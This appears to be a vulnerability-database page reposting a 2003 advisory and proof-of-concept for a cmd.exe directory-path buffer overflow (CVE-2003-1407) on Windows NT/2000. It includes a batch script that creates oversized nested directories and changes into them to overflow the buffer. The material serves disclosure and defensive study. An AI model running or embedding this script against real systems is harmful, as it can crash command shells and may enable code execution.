Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Microsoft Windows NT/2000 - 'cmd.exe' CD Buffer Overflow (PoC)

Related Vulnerabilities: CVE-2003-1407  
Publish Date: 11 Feb 2003
Author: 3APA3A
Source / Download Exploit 
                source: http://www.securityfocus.com/bid/6829/info

The Windows NT and 2000 command prompt (cmd.exe) does not properly handle paths containing more than 256 characters. If the cd (change directory) command is used to change to a subdirectory resulting in a path with more than 256 characters, a buffer is overrun. This could lead to cmd.exe failing with the possibility of code execution on Windows NT 4.0 systems. Automated scripts that traverse and preform operations on arbitrary directories are particularly vulnerable.

On Windows 2000 systems, cmd.exe will become 'jailed' in the directory. 

@echo off
SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%B%c:
cd cd AAAAAAAAAAAA*
cd AAAAAAAAAAAA*
cd BBBBBBBBBBBB*
cd ..

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started